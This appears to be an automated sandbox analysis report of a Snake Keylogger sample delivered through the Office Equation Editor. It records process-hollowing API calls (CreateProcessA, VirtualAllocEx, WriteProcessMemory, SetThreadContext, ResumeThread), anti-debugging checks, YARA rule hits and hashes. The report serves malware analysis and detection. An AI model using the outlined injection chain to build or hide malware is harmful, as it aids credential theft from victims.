                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:9
                                                                                                          Start time:03:20:01
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.2%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.6%
                                                                                                            Total number of Nodes:116
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 12028 2e6b88 12029 2e6b94 12028->12029 12032 2e9938 12029->12032 12030 2e6ba5 12033 2e9964 12032->12033 12037 2ea870 12033->12037 12041 2ea880 12033->12041 12034 2e9a0e 12034->12030 12038 2ea892 12037->12038 12045 2ea8b1 12038->12045 12042 2ea892 12041->12042 12044 2ea8b1 NtQueryInformationProcess 12042->12044 12043 2ea8a6 12043->12034 12044->12043 12046 2ea8da 12045->12046 12050 2ead80 12046->12050 12054 2ead90 12046->12054 12047 2ea8a6 12047->12034 12051 2eadb4 12050->12051 12058 2ea980 12051->12058 12055 2eadb4 12054->12055 12056 2ea980 NtQueryInformationProcess 12055->12056 12057 2eae3b 12056->12057 12057->12047 12059 2eaef0 NtQueryInformationProcess 12058->12059 12061 2eae3b 12059->12061 12061->12047 12062 c5536e 12063 c55378 12062->12063 12064 c55334 12062->12064 12064->12063 12067 c565a8 12064->12067 12071 c565b8 12064->12071 12068 c565cd 12067->12068 12075 c565e9 12068->12075 12069 c565df 12069->12063 12072 c565cd 12071->12072 12074 c565e9 12 API calls 12072->12074 12073 c565df 12073->12063 12074->12073 12076 c56612 12075->12076 12086 c56636 12076->12086 12088 c56c54 12076->12088 12093 c56bf4 12076->12093 12098 c573e4 12076->12098 12102 c56a24 12076->12102 12106 c56d9a 12076->12106 12111 c56f98 12076->12111 12117 c56ea3 12076->12117 12122 c56ff3 12076->12122 12127 c56f40 12076->12127 12131 c56fd1 12076->12131 12086->12069 12089 c56c67 12088->12089 12136 c54bd0 12089->12136 12140 c54bc9 12089->12140 12090 c56a7f 12090->12086 12094 c56bfa 12093->12094 12144 c54a70 12094->12144 12148 c54a68 12094->12148 12095 c56c2c 12152 c54940 12098->12152 12156 c54948 12098->12156 12099 c573aa 12099->12098 12160 c54dfd 12102->12160 12164 c54e08 12102->12164 12107 c56da0 12106->12107 12168 c542f0 12107->12168 12172 c542e8 12107->12172 12108 c56dc6 12112 c56db1 12111->12112 12113 c57421 12112->12113 12115 c542f0 ResumeThread 12112->12115 12116 c542e8 ResumeThread 12112->12116 12113->12086 12114 c56dc6 12115->12114 12116->12114 12118 c56c0b 12117->12118 12119 c56c2c 12118->12119 12120 c54a70 WriteProcessMemory 12118->12120 12121 c54a68 WriteProcessMemory 12118->12121 12120->12119 12121->12119 12123 c5728a 12122->12123 12124 c5704c 12123->12124 12176 c543e0 12123->12176 12180 c543d8 12123->12180 12124->12086 12129 c54a70 WriteProcessMemory 12127->12129 12130 c54a68 WriteProcessMemory 12127->12130 12128 c56f6e 12129->12128 12130->12128 12132 c56fda 12131->12132 12134 c54a70 WriteProcessMemory 12132->12134 12135 c54a68 WriteProcessMemory 12132->12135 12133 c57363 12134->12133 12135->12133 12137 c54c1c ReadProcessMemory 12136->12137 12139 c54c9a 12137->12139 12139->12090 12141 c54c1c ReadProcessMemory 12140->12141 12143 c54c9a 12141->12143 12143->12090 12145 c54abc WriteProcessMemory 12144->12145 12147 c54b5b 12145->12147 12147->12095 12149 c54abc WriteProcessMemory 12148->12149 12151 c54b5b 12149->12151 12151->12095 12153 c5498c VirtualAllocEx 12152->12153 12155 c54a0a 12153->12155 12155->12099 12157 c5498c VirtualAllocEx 12156->12157 12159 c54a0a 12157->12159 12159->12099 12161 c54e8f CreateProcessA 12160->12161 12163 c550ed 12161->12163 12165 c54e8f CreateProcessA 12164->12165 12167 c550ed 12165->12167 12169 c54334 ResumeThread 12168->12169 12171 c54386 12169->12171 12171->12108 12173 c54334 ResumeThread 12172->12173 12175 c54386 12173->12175 12175->12108 12177 c54429 Wow64SetThreadContext 12176->12177 12179 c544a7 12177->12179 12179->12123 12181 c54429 Wow64SetThreadContext 12180->12181 12183 c544a7 12181->12183 12183->12123 12184 2eb580 12185 2eb5a4 12184->12185 12188 2ea9f0 12185->12188 12192 2ea9fc 12185->12192 12189 2eba90 OutputDebugStringW 12188->12189 12191 2ebb42 12189->12191 12191->12185 12193 2ebb88 CloseHandle 12192->12193 12195 2ebc1e 12193->12195 12195->12185

                                                                                                            Executed Functions

                                                                                                            Function 002EAEE8 Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1802 2eaee8-2eafbb NtQueryInformationProcess 1804 2eafbd-2eafc3 1802->1804 1805 2eafc4-2eaffa 1802->1805 1804->1805
                                                                                                            APIs
                                                                                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 002EAFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcessQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 1778838933-0
                                                                                                            • Opcode ID: 71a7b2cb8296c0917fa0688036e69a7969973b57ea94c00ed892b3e7c2dcbb0f
                                                                                                            • Instruction ID: 40bad5d1a5efa597b90c67d0d6dff9e35f85954e72727bd98cc9f85553cdc782
                                                                                                            • Opcode Fuzzy Hash: 71a7b2cb8296c0917fa0688036e69a7969973b57ea94c00ed892b3e7c2dcbb0f
                                                                                                            • Instruction Fuzzy Hash: 4B4189B9D042589FCF10CFAAD984ADEFBB1BB49310F20902AE815B7310D375A915CF65
                                                                                                            Function 002EA980 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 002EAFA5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InformationProcessQuery
                                                                                                            • String ID:
                                                                                                            • API String ID: 1778838933-0
                                                                                                            • Opcode ID: 87dcf37387b4e7c305593c74fce909b84f3ac1d5b4f447c083b8ec57f711db71
                                                                                                            • Instruction ID: 71172529073dfaa1f934b308f108da0f602dea689644831749ace65321eff9f6
                                                                                                            • Opcode Fuzzy Hash: 87dcf37387b4e7c305593c74fce909b84f3ac1d5b4f447c083b8ec57f711db71
                                                                                                            • Instruction Fuzzy Hash: 694176B8D042589FCF10CFAAD984ADEFBB1BB09310F20902AE818B7310D375A955CF65
                                                                                                            Function 002E7E7A Relevance: .5, Instructions: 542COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 082f05867fcc76e1aa6d68ba5ac67d34942c706be04b69462172aa59d1abb5a6
                                                                                                            • Instruction ID: 7d15b995d995a58a1bb71092892dded6c8e82ddf3bff1f3b1384aaa63b372cd6
                                                                                                            • Opcode Fuzzy Hash: 082f05867fcc76e1aa6d68ba5ac67d34942c706be04b69462172aa59d1abb5a6
                                                                                                            • Instruction Fuzzy Hash: 5A529E74E11269CFDB24CFA9C984B9DBBB2FF48301F5581A9D809A7351DB34AA81CF50
                                                                                                            Function 002E6BA9 Relevance: .5, Instructions: 489COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 80e9f1041eafeea52ee68c2a890ff490285985deee18bc50b9431cb2d6788874
                                                                                                            • Instruction ID: bb1f703602bd43114d5266006c0f08e7d20bbf3a3c826e19b1ac0bb90970ab64
                                                                                                            • Opcode Fuzzy Hash: 80e9f1041eafeea52ee68c2a890ff490285985deee18bc50b9431cb2d6788874
                                                                                                            • Instruction Fuzzy Hash: FD32E374910299CFDB54DFA9C584A8EFBB2BF89351F55C59AC408AB212CB30DD85CFA0
                                                                                                            Function 002EC468 Relevance: .1, Instructions: 140COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c7f616894b96a192631b7f48e30143300f343938d9a0df81691012e89ce373ab
                                                                                                            • Instruction ID: 69348c08266751da4393dff44ef2289169d3a47b92694bb6692e8ebc375ccef7
                                                                                                            • Opcode Fuzzy Hash: c7f616894b96a192631b7f48e30143300f343938d9a0df81691012e89ce373ab
                                                                                                            • Instruction Fuzzy Hash: BD518275D016199FDB08DFEAC844AEEBBB2FF89300F24802AD819BB255D7345946CF50
                                                                                                            Function 002EC458 Relevance: .1, Instructions: 102COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 88aa73d8c0322a6ae35f04bf982d3f15ff8addeb02c7d892a4641fdcc9959e8a
                                                                                                            • Instruction ID: f2db4ffab26d46f95e308c763eed04c7c825eb6cde06d0aa323fd30969885a33
                                                                                                            • Opcode Fuzzy Hash: 88aa73d8c0322a6ae35f04bf982d3f15ff8addeb02c7d892a4641fdcc9959e8a
                                                                                                            • Instruction Fuzzy Hash: C241A3B5E006589FEB08CFEAC8556EEBBF2AF88300F24C06AD418AB255D7345946CF40
                                                                                                            Function 00C54DFD Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 c54dfd-c54ea1 2 c54ea3-c54eba 0->2 3 c54eea-c54f12 0->3 2->3 8 c54ebc-c54ec1 2->8 6 c54f14-c54f28 3->6 7 c54f58-c54fae 3->7 6->7 18 c54f2a-c54f2f 6->18 16 c54ff4-c550eb CreateProcessA 7->16 17 c54fb0-c54fc4 7->17 9 c54ee4-c54ee7 8->9 10 c54ec3-c54ecd 8->10 9->3 11 c54ed1-c54ee0 10->11 12 c54ecf 10->12 11->11 15 c54ee2 11->15 12->11 15->9 36 c550f4-c551b9 16->36 37 c550ed-c550f3 16->37 17->16 25 c54fc6-c54fcb 17->25 19 c54f31-c54f3b 18->19 20 c54f52-c54f55 18->20 22 c54f3d 19->22 23 c54f3f-c54f4e 19->23 20->7 22->23 23->23 26 c54f50 23->26 28 c54fcd-c54fd7 25->28 29 c54fee-c54ff1 25->29 26->20 30 c54fd9 28->30 31 c54fdb-c54fea 28->31 29->16 30->31 31->31 33 c54fec 31->33 33->29 48 c551d5-c551d6 36->48 37->36 49 c551b0-c551b9 48->49 50 c551d8-c551d9 48->50 49->48 51 c551e9-c551ed 50->51 52 c551db-c551df 50->52 54 c551fd-c55201 51->54 55 c551ef-c551f3 51->55 52->51 53 c551e1 52->53 53->51 57 c55211-c55215 54->57 58 c55203-c55207 54->58 55->54 56 c551f5 55->56 56->54 59 c55217-c55240 57->59 60 c5524b-c55256 57->60 58->57 61 c55209 58->61 59->60 65 c55257 60->65 61->57 65->65
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C550CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID: `Qd$`Qd$`Qd
                                                                                                            • API String ID: 963392458-3206023809
                                                                                                            • Opcode ID: b8e3091c3cd3a0a5b2cc57e12c7efe322b2b9b74a3525559e7bfbdd0410b6d46
                                                                                                            • Instruction ID: 4a9431dd24d30a83ecb9c44b5543d70074488b316c6f608191a34d9afc8538d9
                                                                                                            • Opcode Fuzzy Hash: b8e3091c3cd3a0a5b2cc57e12c7efe322b2b9b74a3525559e7bfbdd0410b6d46
                                                                                                            • Instruction Fuzzy Hash: 86C10574D002598FDF25CFA8C851BEEBBB1BB09305F0091A9D819B7250DB749AC9CF95
                                                                                                            Function 00C54E08 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 323processCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 66 c54e08-c54ea1 68 c54ea3-c54eba 66->68 69 c54eea-c54f12 66->69 68->69 74 c54ebc-c54ec1 68->74 72 c54f14-c54f28 69->72 73 c54f58-c54fae 69->73 72->73 84 c54f2a-c54f2f 72->84 82 c54ff4-c550eb CreateProcessA 73->82 83 c54fb0-c54fc4 73->83 75 c54ee4-c54ee7 74->75 76 c54ec3-c54ecd 74->76 75->69 77 c54ed1-c54ee0 76->77 78 c54ecf 76->78 77->77 81 c54ee2 77->81 78->77 81->75 102 c550f4-c551b9 82->102 103 c550ed-c550f3 82->103 83->82 91 c54fc6-c54fcb 83->91 85 c54f31-c54f3b 84->85 86 c54f52-c54f55 84->86 88 c54f3d 85->88 89 c54f3f-c54f4e 85->89 86->73 88->89 89->89 92 c54f50 89->92 94 c54fcd-c54fd7 91->94 95 c54fee-c54ff1 91->95 92->86 96 c54fd9 94->96 97 c54fdb-c54fea 94->97 95->82 96->97 97->97 99 c54fec 97->99 99->95 114 c551d5-c551d6 102->114 103->102 115 c551b0-c551b9 114->115 116 c551d8-c551d9 114->116 115->114 117 c551e9-c551ed 116->117 118 c551db-c551df 116->118 120 c551fd-c55201 117->120 121 c551ef-c551f3 117->121 118->117 119 c551e1 118->119 119->117 123 c55211-c55215 120->123 124 c55203-c55207 120->124 121->120 122 c551f5 121->122 122->120 125 c55217-c55240 123->125 126 c5524b-c55256 123->126 124->123 127 c55209 124->127 125->126 131 c55257 126->131 127->123 131->131
                                                                                                            APIs
                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C550CF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcess
                                                                                                            • String ID: `Qd$`Qd$`Qd
                                                                                                            • API String ID: 963392458-3206023809
                                                                                                            • Opcode ID: db50ca48a3e0dfb6f4a0608412e0b4e06d2db050ad9a946cd1eba5b2451373c7
                                                                                                            • Instruction ID: 130009cf621f8599ab6a832017c0a163deaaa570fd789366c4e72cfe9916f99c
                                                                                                            • Opcode Fuzzy Hash: db50ca48a3e0dfb6f4a0608412e0b4e06d2db050ad9a946cd1eba5b2451373c7
                                                                                                            • Instruction Fuzzy Hash: 4CC10474D002598FDF24DFA8C851BEEBBB1BB09305F0092A9D819B7250DB749AC9CF95
                                                                                                            Function 00C54A68 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1762 c54a68-c54adb 1764 c54af2-c54b59 WriteProcessMemory 1762->1764 1765 c54add-c54aef 1762->1765 1767 c54b62-c54bb4 1764->1767 1768 c54b5b-c54b61 1764->1768 1765->1764 1768->1767
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54B43
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: a7091f8c1bad65fe9a2e06fa0aa306f1d854fc0f8b78dd320b9cedec4f56ccaa
                                                                                                            • Instruction ID: 8d0301fecd2595ad7cc7c0940d0164ef58e55eae020004cf018503b153293512
                                                                                                            • Opcode Fuzzy Hash: a7091f8c1bad65fe9a2e06fa0aa306f1d854fc0f8b78dd320b9cedec4f56ccaa
                                                                                                            • Instruction Fuzzy Hash: 2D419BB5D012589FCF04CFA9D984AEEFBB1AB49314F24902AE814B7250D335AA45CF64
                                                                                                            Function 00C54A70 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1773 c54a70-c54adb 1775 c54af2-c54b59 WriteProcessMemory 1773->1775 1776 c54add-c54aef 1773->1776 1778 c54b62-c54bb4 1775->1778 1779 c54b5b-c54b61 1775->1779 1776->1775 1779->1778
                                                                                                            APIs
                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54B43
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3559483778-0
                                                                                                            • Opcode ID: 82ca8624d5595f27339b99c0c2d287e98075a12df6d586229a39a2d14e038479
                                                                                                            • Instruction ID: d86be6eea1cb1f773cf978508dc9c8910faa61c4a52ad3ee15e4ac5f75bba354
                                                                                                            • Opcode Fuzzy Hash: 82ca8624d5595f27339b99c0c2d287e98075a12df6d586229a39a2d14e038479
                                                                                                            • Instruction Fuzzy Hash: 5941AAB5D002589FCF04CFA9D984AEEFBF1BB49314F20902AE814B7210D374AA45CF68
                                                                                                            Function 00C54BC9 Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1784 c54bc9-c54c98 ReadProcessMemory 1787 c54ca1-c54cf3 1784->1787 1788 c54c9a-c54ca0 1784->1788 1788->1787
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54C82
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 97f20a3190b9b191dbdfa1e072085e52e7af1c334f0d15f9cabbf4ab11cf8d28
                                                                                                            • Instruction ID: 250db9a886a0e8a8ca7e14905e3e4c64531460b01b2a9fb8d7d08c8ef60fd416
                                                                                                            • Opcode Fuzzy Hash: 97f20a3190b9b191dbdfa1e072085e52e7af1c334f0d15f9cabbf4ab11cf8d28
                                                                                                            • Instruction Fuzzy Hash: 3041A9B9D002589FCF10CFAAD984AEEFBB1BF49314F14942AE815B7210D734A945DF64
                                                                                                            Function 00C54BD0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1793 c54bd0-c54c98 ReadProcessMemory 1796 c54ca1-c54cf3 1793->1796 1797 c54c9a-c54ca0 1793->1797 1797->1796
                                                                                                            APIs
                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00C54C82
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MemoryProcessRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 1726664587-0
                                                                                                            • Opcode ID: 8f1b6aa2612ec54fbdcc2b3a6fa021817ebe56bea99af8165ce29c908170f202
                                                                                                            • Instruction ID: fc5b7908088259d3c715d993ed7922c485808c74e2ad05cb164034a9d508acbf
                                                                                                            • Opcode Fuzzy Hash: 8f1b6aa2612ec54fbdcc2b3a6fa021817ebe56bea99af8165ce29c908170f202
                                                                                                            • Instruction Fuzzy Hash: A041AAB9D002589FCF10CFAAD984AEEFBB1BF49314F10942AE814B7200D735A945DF68
                                                                                                            Function 00C54940 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00C549F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: e8914612cf15200e88813014a358c2b45d56a3a9af2778cf30f1b6238fee9c4f
                                                                                                            • Instruction ID: 7b382b324be708f753bd17b9b914460599ef67039ba29acea11ae571ef17bafd
                                                                                                            • Opcode Fuzzy Hash: e8914612cf15200e88813014a358c2b45d56a3a9af2778cf30f1b6238fee9c4f
                                                                                                            • Instruction Fuzzy Hash: C941A9B8D002589FCF10CFA9D980AAEFBB1BF49314F10942AE814BB310D335A945DF69
                                                                                                            Function 00C54948 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00C549F2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 90b03fffa86afdd6b7aa8ccd9dc490a3450db158d38988b990d9071d91791aac
                                                                                                            • Instruction ID: e3bbf5d195b47f62add9b7632b1bfb6fbe0c23fdf1399531f870839b3ece21d7
                                                                                                            • Opcode Fuzzy Hash: 90b03fffa86afdd6b7aa8ccd9dc490a3450db158d38988b990d9071d91791aac
                                                                                                            • Instruction Fuzzy Hash: F94199B8D002589FCF14CFA9D984AEEFBB1BB49314F10942AE814B7310D735A945CF69
                                                                                                            Function 00C543D8 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C5448F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: d1e8762a9601235869854d654b77cc0e222ff7b01129ec8de5cfaadd07c6befe
                                                                                                            • Instruction ID: 0e9b3e6d850c4fd9bd147956614b47e099d6db19f590788c5a51c47904910b50
                                                                                                            • Opcode Fuzzy Hash: d1e8762a9601235869854d654b77cc0e222ff7b01129ec8de5cfaadd07c6befe
                                                                                                            • Instruction Fuzzy Hash: 3641AFB5D002589FDF14CFAAD984AEEFFB1AF49314F24842AE814B7240D7349A89CF55
                                                                                                            Function 00C543E0 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C5448F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407699091.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_c50000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ContextThreadWow64
                                                                                                            • String ID:
                                                                                                            • API String ID: 983334009-0
                                                                                                            • Opcode ID: 3e42006266eea297e48bded1e5ab9271961b068c033ca80e8474e5fba4d197da
                                                                                                            • Instruction ID: c098d0753f9bec4b899f690032abf4e6c78021a4dc0ae4ff4c8753fd0ad1fab4
                                                                                                            • Opcode Fuzzy Hash: 3e42006266eea297e48bded1e5ab9271961b068c033ca80e8474e5fba4d197da
                                                                                                            • Instruction Fuzzy Hash: C3419FB5D002589FDF14CFA9D984AEEFBB1AF49314F24842AE814B7240D774A989CF54
                                                                                                            Function 002EA9F0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OutputDebugStringW.KERNEL32(?), ref: 002EBB2A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.407426116.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_2e0000_cdlpohayugo39567.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DebugOutputString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1166629820-0
                                                                                                            • Opcode ID: 7bd7baabbe4e257a3b1632cc6df709540136ad1657da387054052336303e43bc
                                                                                                            • Instruction ID: 91b4259b3b4aa878474271589334b84eb21573a561b71756f3addacec6945e2f
                                                                                                            • Opcode Fuzzy Hash: 7bd7baabbe4e257a3b1632cc6df709540136ad1657da387054052336303e43bc
                                                                                                            • Instruction Fuzzy Hash: D2319CB4D102499FCF14CFAAD584ADEFBF1AB49314F14906AE818B7320D374A945CF94
                                                                                                            Function 00C542E8 Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON
